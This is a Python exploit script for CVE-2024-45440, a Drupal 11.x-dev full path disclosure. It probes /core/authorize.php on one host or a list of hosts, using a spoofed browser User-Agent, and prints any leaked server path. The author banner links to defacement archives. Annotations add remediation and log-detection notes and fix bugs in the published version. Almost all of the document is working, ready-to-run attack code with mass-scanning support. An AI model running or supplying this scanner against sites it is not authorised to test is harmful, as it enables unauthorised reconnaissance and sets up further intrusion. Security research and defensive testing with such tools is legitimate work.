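#!/usr/bin/env python
# Exploit Title: Drupal 11.x-dev - Full Path Disclosure
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Version: 11.x-dev
# CVE: CVE-2024-45440
# -*- coding:UTF-8 -*-
"""Check whether a Drupal site leaks its filesystem path (CVE-2024-45440).

The check issues a single GET to ``/core/authorize.php`` and reports a hit
when the response body mentions ``settings.php``; any absolute path found
next to it is printed.

Notes for defenders, based on the advisory text in ``banners()``:

* The leak is triggered when ``hash_salt`` is set from ``file_get_contents``
  of a file that does not exist, so the remediation that follows directly
  from that condition is to make sure the referenced salt file exists and is
  readable by the web server.
* The probe is an unauthenticated GET to ``/core/authorize.php``; requests
  for that path from unexpected clients are the artefact to look for in
  web-server access logs.
"""
import re

import requests


def banners():
    """Build and return the start-up banner as a single string.

    The banner is made of the CVE id, the advisory description and the
    author's disclaimer, framed by two rules of ``=`` characters.
    """
    cve_id = "CVE-2024-45440"
    description = (
        "Drupal 11.x-dev Full Path Disclosure Vulnerability: "
        "core/authorize.php allows Full Path Disclosure (even when error logging is None) "
        "if the value of hash_salt is file_get_contents of a file that does not exist."
    )
    disclaimer = (
        "This tool is for educational purposes only. Any misuse of this information is the responsibility of "
        "the person utilizing this tool. The author assumes no responsibility or liability for any misuse or "
        "damage caused by this program."
    )
    width = 100
    banner_top_bottom = "=" * width
    # The description is longer than `width`, so centring only affects the id.
    banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
    banner = f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"
    return banner


def scan_single_url(url=None):
    """Request ``/core/authorize.php`` on one host and look for a leaked path.

    Args:
        url: Host, ``host:port`` or full ``http(s)://`` base URL. When
            ``None`` the value is read interactively from stdin.

    Returns:
        ``True`` when the response body contains ``settings.php``; ``False``
        when it does not, or when the request times out or fails.

    A hit only means the substring ``settings.php`` appeared in the body, so
    a positive result should be confirmed by reading the response.
    """
    if url is None:
        print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")
        url = input("[+] IP/Domain: ")

    # The published version only built the target for scheme-less input; a
    # value that already carried http:// or https:// left the target
    # undefined, and the resulting NameError was reported as "Failed!".
    if url.startswith(('https://', 'http://')):
        full_url = url.rstrip('/') + '/core/authorize.php'
    else:
        full_url = 'http://' + url.rstrip('/') + '/core/authorize.php'

    print("[*] Scanning...")

    # No explicit Host header: requests derives it from the URL, and copying
    # the raw input here would be wrong whenever the input includes a scheme.
    # The published version passed this dict positionally, which requests
    # treats as query parameters (params), so its probes carried these names
    # in the query string instead of sending them as headers.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    }

    try:
        response = requests.get(full_url, headers=headers, timeout=10)
    except requests.exceptions.Timeout:
        # requests raises its own Timeout type, not the builtin TimeoutError,
        # so the original handler never ran.
        print(f"[-] {url} Timeout!")
        return False
    except Exception:
        # Deliberately broad: one unreachable or malformed entry must not
        # abort a batch run started from scan_multiple_urls().
        print(f"[-] {url} Failed!")
        return False

    # Non-greedy match from a '/' up to 'settings.php' on the same line; it
    # can pull in markup that precedes the path, so treat the printed value
    # as a pointer to the relevant part of the response, not a clean path.
    pattern = r'(/.*?settings\.php)'
    matches = re.findall(pattern, response.text)

    if 'settings.php' in response.text:
        print(f"[+] {url} Existed!")
        for match in matches:
            print("[+] The full path is:", match)
        return True

    print(f"[-] {url} Not Exist!")
    return False


def scan_multiple_urls():
    """Run ``scan_single_url`` for every entry of a user-supplied text file.

    The file path is read from stdin; the file is expected to hold one host
    or URL per line. Entries that produced a hit are listed at the end.
    """
    print("[+] Input the path of txt Example: ./url.txt or C:\\the\\path\\to\\url.txt")
    url_path = input("[+] Path: ")
    url_list = []
    try:
        with open(url_path, 'r', encoding='utf-8') as f:
            # Blank lines are skipped; the original turned each of them into
            # a request for "http:///core/authorize.php".
            url_list = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print("[-] File Not Found!")

    result_list = [url for url in url_list if scan_single_url(url)]

    print("[+] Successful Target:")
    for result in result_list:
        print(f"[+] {result}")


def main():
    """Print the banner and dispatch to the single-host or batch check."""
    print(banners())
    print("[1] Scan single url\n[2] Scan multiple urls")
    choice = input("[+] Choose: ")
    if choice == '1':
        scan_single_url()
    elif choice == '2':
        scan_multiple_urls()
    else:
        print("[-] Invalid option selected!")


if __name__ == '__main__':
    main()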